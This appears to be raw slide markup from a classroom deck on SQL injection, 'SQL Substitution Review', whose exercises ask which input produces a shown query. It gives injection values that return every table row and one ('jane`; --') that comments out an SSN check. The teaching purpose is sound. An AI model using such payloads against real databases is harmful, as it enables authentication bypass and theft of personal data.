            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1197" name="Google Shape;1197;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490650" y="2836050"/>
            <a:ext cx="8223600" cy="197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highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME = `` OR id=`1`</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Note, you do not have to include the final single quote. </a:t>
            </a:r>
            <a:endParaRPr b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>This returns every row in the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>warehouse.exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> table. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">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1" name="Shape 1201"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202" name="Google Shape;1202;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SQL Substitution Review - Simple Substitutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1203" name="Google Shape;1203;p7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4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What value does </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1204" name="Google Shape;1204;p7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5" name="Google Shape;1205;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429750" y="1546700"/>
            <a:ext cx="8284500" cy="979800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM warehouse.exploits WHERE name=`` OR ` ` `;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206" name="Google Shape;1206;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490650" y="2836050"/>
            <a:ext cx="8223600" cy="197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t/>
            </a:r>
            <a:endParaRPr sz="1600">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0" name="Shape 1210"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211" name="Google Shape;1211;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SQL Substitution Review - Simple Substitutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1212" name="Google Shape;1212;p7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4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What value does </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1213" name="Google Shape;1213;p7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14" name="Google Shape;1214;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429750" y="1546700"/>
            <a:ext cx="8284500" cy="979800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM warehouse.exploits WHERE name=`` OR ` ` `;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="Google Shape;1215;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490650" y="2836050"/>
            <a:ext cx="8223600" cy="197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highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME = ` </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>This is invalid SQL, so it throws an error. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">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9" name="Shape 1219"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1220" name="Google Shape;1220;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SQL Substitution Review - Simple Substitutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1221" name="Google Shape;1221;p7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4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What value does </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1222" name="Google Shape;1222;p7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23" name="Google Shape;1223;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429750" y="1546700"/>
            <a:ext cx="8284500" cy="1035900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>-- Retrieve account data for `$USERNAME`, as long as they provide the right SSN       </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM warehouse.accounts WHERE name='jane'; -- AND ssn='$USER_SSN';</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolat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7" name="Shape 1227"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1228" name="Google Shape;1228;p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SQL Substitution Review - Simple Substitutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229" name="Google Shape;1229;p7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4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What value does </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1230" name="Google Shape;1230;p7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31" name="Google Shape;1231;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429750" y="1546700"/>
            <a:ext cx="8284500" cy="1035900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>-- Retrieve account data for `$USERNAME`, as long as they provide the right SSN       </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM warehouse.accounts WHERE name='jane'; -- AND ssn='$USER_SSN';</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232" name="Google Shape;1232;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490650" y="2836050"/>
            <a:ext cx="8223600" cy="197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highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$USERNAME = jane`; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFD966"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
